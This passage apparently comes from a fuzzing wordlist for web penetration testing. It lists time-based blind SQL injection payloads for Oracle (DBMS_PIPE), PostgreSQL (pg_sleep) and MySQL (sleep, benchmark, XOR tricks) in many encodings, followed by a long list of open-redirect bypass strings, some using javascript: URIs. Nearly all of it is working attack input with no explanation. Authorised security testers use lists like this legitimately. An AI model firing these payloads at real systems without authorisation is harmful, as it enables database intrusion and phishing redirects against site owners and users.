\\n' and 1337=dbms_pipe.receive_message(('a'),120) -- 
\\n' and 1337=dbms_pipe.receive_message(1,120) -- 
\\n' or 1337=dbms_pipe.receive_message(('a'),120) -- 
\\n' or 1337=dbms_pipe.receive_message(1,120) -- 
\\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
\\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\\n\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\n\\' and 1337=dbms_pipe.receive_message(1,120) -- 
\\n\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\n\\' or 1337=dbms_pipe.receive_message(1,120) -- 
\\n\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
\\n\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\r\\n and 1337=dbms_pipe.receive_message(('a'),120)
\\r\\n and 1337=dbms_pipe.receive_message(('a'),120) -- 
\\r\\n and 1337=dbms_pipe.receive_message((\\'a\\'),120)
\\r\\n and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\r\\n and 1337=dbms_pipe.receive_message(1,120)
\\r\\n and 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n or 1337=dbms_pipe.receive_message(('a'),120)
\\r\\n or 1337=dbms_pipe.receive_message(('a'),120) -- 
\\r\\n or 1337=dbms_pipe.receive_message((\\'a\\'),120)
\\r\\n or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\r\\n or 1337=dbms_pipe.receive_message(1,120)
\\r\\n or 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n' and 1337=dbms_pipe.receive_message(('a'),120) -- 
\\r\\n' and 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n' or 1337=dbms_pipe.receive_message(('a'),120) -- 
\\r\\n' or 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
\\r\\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\r\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
\\r\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
\\r\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
\\r\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\\r\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
\\r\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
\\r\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
\\r\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\\r\\n\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\r\\n\\' and 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\r\\n\\' or 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
\\r\\n\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\n and 1337=dbms_pipe.receive_message(('a'),120)
\n and 1337=dbms_pipe.receive_message(('a'),120) -- 
\n and 1337=dbms_pipe.receive_message((\'a\'),120)
\n and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\n and 1337=dbms_pipe.receive_message(1,120)
\n and 1337=dbms_pipe.receive_message(1,120) -- 
\n or 1337=dbms_pipe.receive_message(('a'),120)
\n or 1337=dbms_pipe.receive_message(('a'),120) -- 
\n or 1337=dbms_pipe.receive_message((\'a\'),120)
\n or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\n or 1337=dbms_pipe.receive_message(1,120)
\n or 1337=dbms_pipe.receive_message(1,120) -- 
\n' and 1337=dbms_pipe.receive_message(('a'),120) -- 
\n' and 1337=dbms_pipe.receive_message(1,120) -- 
\n' or 1337=dbms_pipe.receive_message(('a'),120) -- 
\n' or 1337=dbms_pipe.receive_message(1,120) -- 
\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\n\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\n\' and 1337=dbms_pipe.receive_message(1,120) -- 
\n\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\n\' or 1337=dbms_pipe.receive_message(1,120) -- 
\n\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
\n\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\r\n and 1337=dbms_pipe.receive_message(('a'),120)
\r\n and 1337=dbms_pipe.receive_message(('a'),120) -- 
\r\n and 1337=dbms_pipe.receive_message((\'a\'),120)
\r\n and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\r\n and 1337=dbms_pipe.receive_message(1,120)
\r\n and 1337=dbms_pipe.receive_message(1,120) -- 
\r\n or 1337=dbms_pipe.receive_message(('a'),120)
\r\n or 1337=dbms_pipe.receive_message(('a'),120) -- 
\r\n or 1337=dbms_pipe.receive_message((\'a\'),120)
\r\n or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\r\n or 1337=dbms_pipe.receive_message(1,120)
\r\n or 1337=dbms_pipe.receive_message(1,120) -- 
\r\n' and 1337=dbms_pipe.receive_message(('a'),120) -- 
\r\n' and 1337=dbms_pipe.receive_message(1,120) -- 
\r\n' or 1337=dbms_pipe.receive_message(('a'),120) -- 
\r\n' or 1337=dbms_pipe.receive_message(1,120) -- 
\r\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
\r\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\r\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
\r\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
\r\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
\r\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\r\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
\r\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
\r\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
\r\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\r\n\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\r\n\' and 1337=dbms_pipe.receive_message(1,120) -- 
\r\n\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\r\n\' or 1337=dbms_pipe.receive_message(1,120) -- 
\r\n\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
\r\n\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  --

postgresql

;SELECT pg_sleep(10);
;SELECT pg_sleep(10);
SELECT pg_sleep(10);
1 SELECT pg_sleep(10);
or SELECT pg_sleep(10);
(SELECT pg_sleep(10))
pg_sleep(10)--
1 or pg_sleep(10)--
" or pg_sleep(10)--
' or pg_sleep(10)--
1) or pg_sleep(10)--
") or pg_sleep(10)--
') or pg_sleep(10)--
1)) or pg_sleep(10)--
")) or pg_sleep(10)--
')) or pg_sleep(10)--
pg_SLEEP(10)
pg_SLEEP(10)--
pg_SLEEP(10)#
or pg_SLEEP(10)
or pg_SLEEP(10)--
or pg_SLEEP(10)#
' SELECT pg_sleep(10);
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(10))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(10))-- 1337
1' AND 1337=(SELECT 1337 FROM PG_SLEEP(10)) AND '1337'='1337
1') AND 1337=(SELECT 1337 FROM PG_SLEEP(10)) AND ('1337'='1337
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(10)) AND (1337=1337
or pg_sleep(10)--
) or pg_sleep(10)--
)) or pg_sleep(10)--
 and 1337=(select 1337 from pg_sleep(120))
 and 1337=(select 1337 from pg_sleep(120)) -- 
 or 1337=(select 1337 from pg_sleep(120))
 or 1337=(select 1337 from pg_sleep(120)) -- 
%00 and 1337=(select 1337 from pg_sleep(120))
%00 and 1337=(select 1337 from pg_sleep(120)) -- 
%00 or 1337=(select 1337 from pg_sleep(120))
%00 or 1337=(select 1337 from pg_sleep(120)) -- 
%00' and 1337=(select 1337 from pg_sleep(120)) -- 
%00' or 1337=(select 1337 from pg_sleep(120)) -- 
%00';select pg_sleep(120) -- 
%00;select pg_sleep(120)
%00;select pg_sleep(120) -- 
%00\' and 1337=(select 1337 from pg_sleep(120)) -- 
%00\' or 1337=(select 1337 from pg_sleep(120)) -- 
%00\';select pg_sleep(120) -- 
%00\\' and 1337=(select 1337 from pg_sleep(120)) -- 
%00\\' or 1337=(select 1337 from pg_sleep(120)) -- 
%00\\';select pg_sleep(120) -- 
%0a and 1337=(select 1337 from pg_sleep(120))
%0a and 1337=(select 1337 from pg_sleep(120)) -- 
%0a or 1337=(select 1337 from pg_sleep(120))
%0a or 1337=(select 1337 from pg_sleep(120)) -- 
%0a' and 1337=(select 1337 from pg_sleep(120)) -- 
%0a' or 1337=(select 1337 from pg_sleep(120)) -- 
%0a';select pg_sleep(120) -- 
%0a;select pg_sleep(120)
%0a;select pg_sleep(120) -- 
%0a\' and 1337=(select 1337 from pg_sleep(120)) -- 
%0a\' or 1337=(select 1337 from pg_sleep(120)) -- 
%0a\';select pg_sleep(120) -- 
%0a\\' and 1337=(select 1337 from pg_sleep(120)) -- 
%0a\\' or 1337=(select 1337 from pg_sleep(120)) -- 
%0a\\';select pg_sleep(120) -- 
%0d%0a and 1337=(select 1337 from pg_sleep(120))
%0d%0a and 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a or 1337=(select 1337 from pg_sleep(120))
%0d%0a or 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a' and 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a' or 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a';select pg_sleep(120) -- 
%0d%0a;select pg_sleep(120)
%0d%0a;select pg_sleep(120) -- 
%0d%0a\' and 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a\' or 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a\';select pg_sleep(120) -- 
%0d%0a\\' and 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a\\' or 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a\\';select pg_sleep(120) -- 
' and 1337=(select 1337 from pg_sleep(120)) -- 
' or 1337=(select 1337 from pg_sleep(120)) -- 
';select pg_sleep(120) -- 
0x00 and 1337=(select 1337 from pg_sleep(120))
0x00 and 1337=(select 1337 from pg_sleep(120)) -- 
0x00 or 1337=(select 1337 from pg_sleep(120))
0x00 or 1337=(select 1337 from pg_sleep(120)) -- 
0x00' and 1337=(select 1337 from pg_sleep(120)) -- 
0x00' or 1337=(select 1337 from pg_sleep(120)) -- 
0x00';select pg_sleep(120) -- 
0x00;select pg_sleep(120)
0x00;select pg_sleep(120) -- 
0x00\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x00\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x00\';select pg_sleep(120) -- 
0x00\\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x00\\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x00\\';select pg_sleep(120) -- 
0x0a and 1337=(select 1337 from pg_sleep(120))
0x0a and 1337=(select 1337 from pg_sleep(120)) -- 
0x0a or 1337=(select 1337 from pg_sleep(120))
0x0a or 1337=(select 1337 from pg_sleep(120)) -- 
0x0a' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0a' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0a';select pg_sleep(120) -- 
0x0a;select pg_sleep(120)
0x0a;select pg_sleep(120) -- 
0x0a\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0a\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0a\';select pg_sleep(120) -- 
0x0a\\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0a\\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0a\\';select pg_sleep(120) -- 
0x0d0a and 1337=(select 1337 from pg_sleep(120))
0x0d0a and 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a or 1337=(select 1337 from pg_sleep(120))
0x0d0a or 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a';select pg_sleep(120) -- 
0x0d0a;select pg_sleep(120)
0x0d0a;select pg_sleep(120) -- 
0x0d0a\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a\';select pg_sleep(120) -- 
0x0d0a\\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a\\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a\\';select pg_sleep(120) -- 
;select pg_sleep(120)
;select pg_sleep(120) -- 
\' and 1337=(select 1337 from pg_sleep(120)) -- 
\' or 1337=(select 1337 from pg_sleep(120)) -- 
\';select pg_sleep(120) -- 
\\' and 1337=(select 1337 from pg_sleep(120)) -- 
\\' or 1337=(select 1337 from pg_sleep(120)) -- 
\\';select pg_sleep(120) -- 
\\n and 1337=(select 1337 from pg_sleep(120))
\\n and 1337=(select 1337 from pg_sleep(120)) -- 
\\n or 1337=(select 1337 from pg_sleep(120))
\\n or 1337=(select 1337 from pg_sleep(120)) -- 
\\n' and 1337=(select 1337 from pg_sleep(120)) -- 
\\n' or 1337=(select 1337 from pg_sleep(120)) -- 
\\n';select pg_sleep(120) -- 
\\n;select pg_sleep(120)
\\n;select pg_sleep(120) -- 
\\n\\' and 1337=(select 1337 from pg_sleep(120)) -- 
\\n\\' or 1337=(select 1337 from pg_sleep(120)) -- 
\\n\\';select pg_sleep(120) -- 
\\r\\n and 1337=(select 1337 from pg_sleep(120))
\\r\\n and 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n or 1337=(select 1337 from pg_sleep(120))
\\r\\n or 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n' and 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n' or 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n';select pg_sleep(120) -- 
\\r\\n;select pg_sleep(120)
\\r\\n;select pg_sleep(120) -- 
\\r\\n\\' and 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n\\' or 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n\\';select pg_sleep(120) -- 
\n and 1337=(select 1337 from pg_sleep(120))
\n and 1337=(select 1337 from pg_sleep(120)) -- 
\n or 1337=(select 1337 from pg_sleep(120))
\n or 1337=(select 1337 from pg_sleep(120)) -- 
\n' and 1337=(select 1337 from pg_sleep(120)) -- 
\n' or 1337=(select 1337 from pg_sleep(120)) -- 
\n';select pg_sleep(120) -- 
\n;select pg_sleep(120)
\n;select pg_sleep(120) -- 
\n\' and 1337=(select 1337 from pg_sleep(120)) -- 
\n\' or 1337=(select 1337 from pg_sleep(120)) -- 
\n\';select pg_sleep(120) -- 
\r\n and 1337=(select 1337 from pg_sleep(120))
\r\n and 1337=(select 1337 from pg_sleep(120)) -- 
\r\n or 1337=(select 1337 from pg_sleep(120))
\r\n or 1337=(select 1337 from pg_sleep(120)) -- 
\r\n' and 1337=(select 1337 from pg_sleep(120)) -- 
\r\n' or 1337=(select 1337 from pg_sleep(120)) -- 
\r\n';select pg_sleep(120) -- 
\r\n;select pg_sleep(120)
\r\n;select pg_sleep(120) -- 
\r\n\' and 1337=(select 1337 from pg_sleep(120)) -- 
\r\n\' or 1337=(select 1337 from pg_sleep(120)) -- 
\r\n\';select pg_sleep(120) --

xor

'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
X'XOR(if(now()=sysdate(),//sleep(10)//,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep(10)),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(10000000,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(10)))a)XOR'Z
(SELECT(0)FROM(SELECT(SLEEP(10)))a)
'XOR(if(now()=sysdate(),sleep(10),0))OR'
1 AND (SELECT(0)FROM(SELECT(SLEEP(10)))a)-- wXyW
(SELECT * FROM (SELECT(SLEEP(10)))a)
'%2b(select*from(select(sleep(10)))a)%2b'
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(10))END
');(SELECT 4564 FROM PG_SLEEP(10))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(10)))ghXo) AND 'IKlK'='IKlK
(select*from(select(sleep(10)))a)
'%2b(select*from(select(sleep(10)))a)%2b'
*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(10),false)))a)+'
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(10)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000,sha1(1))%2b'
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(10),1)))a)--%20 - true
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10*1),0))XOR'Z
if(now()=sysdate(),sleep(10),0)
'XOR(if(now()=sysdate(),sleep(10),0))XOR'
'XOR(if(now()=sysdate(),sleep(10*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(10),0))|'Z
(select(0)from(select(sleep(10)))v)
'%2b(select*from(select(sleep(10)))a)%2b'
(select*from(select(sleep(10)))a)
1'%2b(select*from(select(sleep(10)))a)%2b'
,(select * from (select(sleep(10)))a)
desc%2c(select*from(select(sleep(10)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(10))A))

开放重定向

/%09/google.com
/%2f%2fgoogle.com
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%5cgoogle.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.google.com
//%09/google.com
//%5cgoogle.com
///%09/google.com
///%5cgoogle.com
////%09/google.com
////%5cgoogle.com
/////google.com
/////google.com/
////google.com/
////google.com/%2e%2e
////google.com/%2e%2e%2f
////google.com/%2f%2e%2e
////google.com/%2f..
////google.com//
///google.com
///google.com/
//google.com/%2f..
///google.com/%2f..
https://google.com/%2f..
//www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
https://www.google.com/%2f%2e%2e
//google.com/
https://google.com/
//google.com//
///google.com//
https://google.com//
//www.google.com/%2e%2e%2f
///www.google.com/%2e%2e%2f
////www.google.com/%2e%2e%2f
https://www.google.com/%2e%2e%2f
///www.google.com/%2e%2e
////www.google.com/%2e%2e
https:///www.google.com/%2e%2e
/https://www.google.com/%2e%2e
https:///www.google.com/%2f%2e%2e
https://%09/google.com
https:google.com
//google%E3%80%82com
\/\/google.com/
/\/google.com/
http://0xd8.0x3a.0xd6.0xce
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ーgoogle.com
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ーgoogle.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
///google.com/%2e%2e
///google.com/%2e%2e%2f
///google.com/%2f%2e%2e
//google.com
//google.com/%2e%2e
//google.com/%2e%2e%2f
//google.com/%2f%2e%2e
//https:///google.com/%2e%2e
//https://google.com/%2e%2e%2f
/<>//google.com
/?url=//google.com&next=//google.com&redirect=//google.com&redir=//google.com&rurl=//google.com&redirect_uri=//google.com
/?url=/\/google.com&next=/\/google.com&redirect=/\/google.com&redirect_uri=/\/google.com
/?url=Https://google.com&next=Https://google.com&redirect=Https://google.com&redir=Https://google.com&rurl=Https://google.com&redirect_uri=Https://google.com<br/>/\/\/google.com/
/google.com/%2f%2e%2e
/http://google.com
/http:/google.com
/https:/%5cgoogle.com/
/https://%5cgoogle.com
/https://google.com/%2e%2e
/https://google.com/%2f%2e%2e
/https:google.com
/redirect?url=//google.com&next=//google.com&redirect=//google.com&redir=//google.com&rurl=//google.com&redirect_uri=//google.com
/redirect?url=Https://google.com&next=Https://google.com&redirect=Https://google.com&redir=Https://example.com&rurl=Https://google.com&redirect_uri=Https://google.com
//%2fxgoogle.com
//localdomain%E3%80%82pw
http://0xd83ad6ce
http://3627734734
http://472.314.470.462
http://0330.072.0326.0316
http://00330.00072.0000326.00000316
http://0xd8.072.54990
http://0xd8.3856078
http://00330.3856078
http://00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:3627734734
http:472.314.470.462
http:0330.072.0326.0316
http:00330.00072.0000326.00000316
http:[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:0xd8.072.54990
http:0xd8.3856078
http:00330.3856078
http:00330.0x3a.54990
<>//google.com
http://.google.com
https://google.com/https://google.com/
http://google.com\tgoogle.com/
//google.com\tgoogle.com/
http://google.com%2f%2f.google.com/
http://google.com%5c%5c.google.com/
http://google.com%3F.google.com/
http://google.com%23.google.com/
http://google.com:80%40google.com/
http://google.com%2egoogle.com/
/〱ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
〱ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
$2f%2f216.58.214.206%2f%2f
$2f%2f3627734734%2f%2f
$2f%2fgoogle.com
$2f%2fgoogle.com%2f%2f
%01https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
/%09/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
//%09/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
///%09/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
////%09/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
////216.58.214.206
///216.58.214.206
//216.58.214.206
/\216.58.214.206
/216.58.214.206
216.58.214.206
%2f$2f216.58.214.206
%2f$2f3627734734
%2f$2fgoogle.com
%2f216.58.214.206
%2f216.58.214.206//
%2f216.58.214.206%2f%2f
//%2f%2fgoogle.com
/%2f%2fⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
//%2f%2fⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
%2f3627734734
%2f3627734734//
%2f3627734734%2f%2f
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com
%2fgoogle.com//
\\google.com
%2fgoogle.com%2f%2f
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
//%2F/google.com
/%0D/google.com
/%2F/google.com
/%5Cgoogle.com
/%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
//%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
///%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
////%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
/\google%252ecom
google%252ecom
../google.com
//google%00.com
////google.com
//\/google.com/
//\google.com
/<>//google.com
/\/\/google.com/
/\/google.com
/\google.com
/google.com
//google.com/%2E%2E
//google.com/%2F.. 
/google.com/%2F.. 
//google.com//%2F%2E%2E
google.com/.jpg
http:%0a%0dgoogle.com
http:%0a%0dⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
http:/\/\google.com
http:/google.com
http:google.com
/http:/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
http://.ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
http:/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
http:ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
https://%09/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
https://%0a%0dgoogle.com
https://%0a%0dⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
https%3a%2f%2fgoogle.com%2f
https:/%5cgoogle.com/
/https:/%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
/https://%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
https:/%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
https:/\google.com
https://google%E3%80%82com
//https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂//
/https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
https:ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
//https:///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e
/https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e
//https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e%2f
/https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f..
/https:///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f%2e%2e
/https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f%2e%2e
javascript:confirm(1)
javascript:prompt(1)
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%00。Pⓦ
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%E3%80%82pw
/.ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
/////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
/////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂//
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂//
//\/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂//
/\/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
<>//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
\/\/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
